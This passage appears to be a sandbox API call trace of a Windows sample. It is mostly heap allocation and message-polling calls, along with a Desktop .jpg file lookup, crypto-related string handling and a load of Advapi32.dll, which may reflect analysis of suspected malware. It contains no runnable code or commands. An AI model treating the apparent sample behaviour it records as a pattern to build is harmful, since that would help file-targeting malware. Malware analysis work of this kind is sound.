0x2e53b18 [0135.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0135.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0135.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0135.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0135.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0135.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0135.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0135.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0135.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0135.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0135.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0135.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0135.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0135.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0135.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0135.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0135.674] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0135.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0135.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0135.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0135.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0135.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0135.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0135.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0135.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0135.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0135.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0135.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0135.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0135.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0135.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0135.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0135.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0135.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0135.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0135.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0135.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0135.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0135.675] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/alm7UiDYbRcNr.jpg", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd80d70, ftCreationTime.dwHighDateTime=0x1d5ed23, ftLastAccessTime.dwLowDateTime=0xf9aa8940, ftLastAccessTime.dwHighDateTime=0x1d5ed4f, ftLastWriteTime.dwLowDateTime=0xf9aa8940, ftLastWriteTime.dwHighDateTime=0x1d5ed4f, nFileSizeHigh=0x0, nFileSizeLow=0x166f2, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="alm7UiDYbRcNr.jpg", cAlternateFileName="ALM7UI~1.JPG")) returned 0xa87250 [0135.675] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0135.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0135.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0135.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0135.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0135.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0135.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0135.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0135.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0135.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0135.676] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0135.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0135.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0135.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0135.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0135.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0135.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0135.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0135.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0135.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0135.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0135.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0135.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0135.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0135.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0135.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0135.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0135.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0135.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0135.679] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0135.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0135.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0135.679] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0135.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0135.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0135.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0135.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0135.679] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0135.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0135.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0135.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0135.680] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0135.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0135.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0135.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0135.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0135.680] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0135.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0135.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0135.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0135.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0135.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0135.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0135.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0135.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0135.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0135.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0135.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0135.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0135.680] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0135.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0135.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0135.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0135.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0135.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0135.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0135.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0135.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0135.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0135.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0135.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0135.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0135.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0135.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0135.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0135.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0135.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0135.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0135.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0135.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0135.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0135.681] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0135.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0135.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0135.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0135.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0135.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0135.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0135.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0135.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0135.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0135.682] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0135.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0135.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0135.682] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0135.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0135.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0135.682] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0135.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0135.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0135.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0135.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cb8 [0135.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0135.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0135.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0135.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0135.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0135.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0135.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0135.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0135.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0135.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0135.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0135.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0135.683] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0135.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0135.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0135.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0135.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0135.683] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0135.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0135.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0135.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0135.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0135.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0135.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0135.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0135.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0135.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0135.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0135.684] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0135.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0135.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0135.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0135.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0135.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0135.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0135.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0135.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0135.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0135.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0135.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0135.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0135.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0135.684] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0135.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0135.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0135.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0135.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0135.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0135.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0135.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0135.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0135.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0135.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0135.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0135.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0135.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0135.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0135.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0135.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0135.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0135.685] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0135.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0135.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0135.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0135.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0135.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0135.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0135.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0135.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0135.685] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0135.686] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0135.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0135.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0135.686] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0135.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0135.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0135.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0135.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0135.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0135.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0135.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0135.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0135.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0135.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0135.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0135.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0135.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0135.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0135.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0135.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0135.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0135.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0135.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 